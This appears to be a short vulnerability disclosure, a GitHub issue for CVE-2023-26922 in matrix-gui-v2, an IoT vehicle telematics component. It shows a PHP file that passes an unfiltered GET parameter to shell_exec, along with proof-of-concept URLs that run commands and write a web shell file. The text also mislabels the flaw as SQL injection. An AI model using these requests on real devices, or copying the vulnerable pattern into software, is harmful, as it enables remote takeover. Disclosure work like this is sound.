Headline
CVE-2023-26922: execute-command.php Command execution vulnerability · Issue #1 · varigit/matrix-gui-v2
SQL injection vulnerability found in Varisicte matrix-gui v.2 allows a remote attacker to execute arbitrary code via the shell_exect parameter to the \www\pages\matrix-gui-2.0 endpoint.
The execute-command.php file exists in the \www\pages\matrix-gui-2.0 directory of the firmware
Vulnerability type: command execution
This source code is used for the tbox in the Internet of Vehicles, which can control the car’s brain, so it is very dangerous
`<?php
$command = $_GET[‘command’];
$output = shell_exec($command);
echo $output;
?>
`
Through shell_ Exec carries out command execution, and the execution content is controlled by the command of get parameter transfer
Vulnerability exploitation process:
Pass the parameter command to the shell through get_ Exec for command execution and final output
POC:
/execute-command.php?command=ls
/execute-command.php?command=echo “” > shell.php
Example:
http://192.168.160.128:7777/execute-command.php?command=ls
/execute-command.php?command=echo “” > shell.php
To sum up, the device has a remote command execution vulnerability, which can be performed by injecting malicious code to obtain server permissions.